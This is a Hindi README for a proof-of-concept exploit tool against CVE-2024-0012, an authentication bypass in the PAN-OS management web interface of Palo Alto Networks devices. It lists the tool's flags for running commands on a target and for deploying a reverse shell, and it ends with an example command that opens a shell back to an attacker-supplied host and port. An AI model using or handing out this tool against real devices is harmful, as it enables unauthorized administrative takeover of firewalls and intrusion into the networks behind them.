
CVE-2024-0012 PAN-OS: प्रबंधन वेब इंटरफ़ेस में प्रमाणीकरण बाईपास (PAN-SA-2024-0015) RCE POC
CVE-2024-0012 पालो ऑल्टो नेटवर्क्स PAN-OS सॉफ़्टवेयर में एक प्रमाणीकरण बाईपास है, जो एक अप्रमाणित हमलावर को प्रबंधन वेब इंटरफ़ेस तक नेटवर्क पहुंच रखने वाले को PAN-OS व्यवस्थापक विशेषाधिकार प्राप्त करने, प्रशासनिक कार्य करने, कॉन्फ़िगरेशन के साथ छेड़छाड़ करने, या अन्य प्रमाणित विशेषाधिकार वृद्धि कमजोरियों का शोषण करने में सक्षम बनाता है।

| ❗ अस्वीकरण |
|---|
| यह प्रोजेक्ट मुख्य रूप से एक स्टैंडअलोन CLI टूल के रूप में उपयोग किए जाने के लिए बनाया गया है। इस एक्सप्लॉइट को सेवा के रूप में चलाना सुरक्षा जोखिम पैदा कर सकता है। इसे सावधानीपूर्वक और अतिरिक्त सुरक्षा उपायों के साथ उपयोग करने की अनुशंसा की जाती है। DWYOR |
python3 cve-2024-0012.py -h
यह टूल के लिए सहायता प्रदर्शित करेगा। यहाँ वे सभी स्विच हैं जो यह समर्थन करता है।
Usage:
python3 cve-2024-0012.py [flags]
Flags:
-h, --help show this help message and exit
--url URL Target base URL (http:// or https://)
--no-verify Disable SSL verification
--timeout TIMEOUT Request timeout in seconds
--command COMMAND Command to execute on the target
--reverse-shell Deploy a reverse shell to the target
--lhost LHOST Local host for reverse shell connection (required for reverse shell)
--lport LPORT Local port for reverse shell connection (required for reverse shell)
रिवर्स शेल कमांड।
python3 cve-2024-0012.py --url "http://target.url" --no-verify --reverse-shell --lhost "your-ip" --lport 4444